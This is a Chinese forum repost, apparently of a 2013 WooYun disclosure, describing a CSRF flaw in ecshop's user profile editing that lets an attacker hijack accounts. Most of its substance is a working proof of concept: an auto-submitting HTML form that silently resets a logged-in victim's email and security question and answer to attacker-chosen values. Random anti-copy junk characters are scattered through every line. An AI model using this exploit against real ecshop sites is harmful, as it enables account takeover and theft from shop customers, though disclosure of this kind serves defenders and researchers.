找回密码
 立即注册
查看: 2661|回复: 0
打印 上一主题 下一主题

ecshop修改任意用户密码漏洞的CSRF利用

[复制链接]
跳转到指定楼层
楼主
发表于 2013-2-20 08:30:14 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
简要描述:( V3 q( O/ B+ e
ecshop在设计认证机制的时候存在一个问题,导致恶意用户可以窃取其他用户的密码,这个过程可以通过xss和csrf实现4 k9 w8 W! j5 U% k- a

2 [' d* Y4 p; q/ LDemo For:http://www.wooyun.org/bug.php?action=view&id=395) `: \& F$ u  A7 l0 X/ ^- |2 n7 v$ X

4 t: f1 [8 B# S详细说明:
: V1 Y8 w$ O/ C- b3 e8 {( m& x; M0 f' R利用csrf和xss可以突破官方所说的“障碍”$ k- `/ c$ @6 M6 W' Q5 \2 \7 V
xss版本已经有人说明
. l$ s+ Z4 v! H3 ?4 c这里给出csrf版本. O5 B( `) l0 T0 ]7 I9 y
5 c! o$ _; L3 @  H- m; j
漏洞证明:
- p' h+ S8 X7 s9 _7 G. N+ L<html>$ [5 ~: a3 Z. g! ~' q- @6 ]' g
<body>
* H5 K# w5 R- z$ c5 B. v' G<form action="http://www.wooyun.org/ecshop/user.php" method="POST">  G/ E% c0 J1 ^4 m+ j3 ]+ v" I) h% C
<INPUT TYPE="text" NAME="email" value="hack@wooyun.org">: W8 E9 |+ V3 _3 A  r
<INPUT TYPE="text" NAME="act" value="act_edit_profile">9 Q4 z1 Q& E; s6 u' u% E
<INPUT TYPE="text" NAME="sel_question" value="ecshop">6 q% T/ e9 N+ |( v5 a4 v5 g
<INPUT TYPE="text" NAME="passwd_answer" value="exploit">/ k2 R, X0 l0 X- c/ \9 A
</body>
" _( j1 c$ E" F! \<script>
2 P4 S* w5 p! c; _/ j! Wdocument.forms[0].submit();4 @. K1 U' J# p( F& Y2 p# N3 s
</script>
0 u% T3 f% F+ s+ J4 r8 z</html>! Y7 b6 b3 T5 ]% Q
构造该网页,用户在登录情况下访问该网页将导致email以及一些其他安全信息丢失
( U, }6 _  f+ {  B! k
) `( Z# F' A2 M8 z' H. X
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表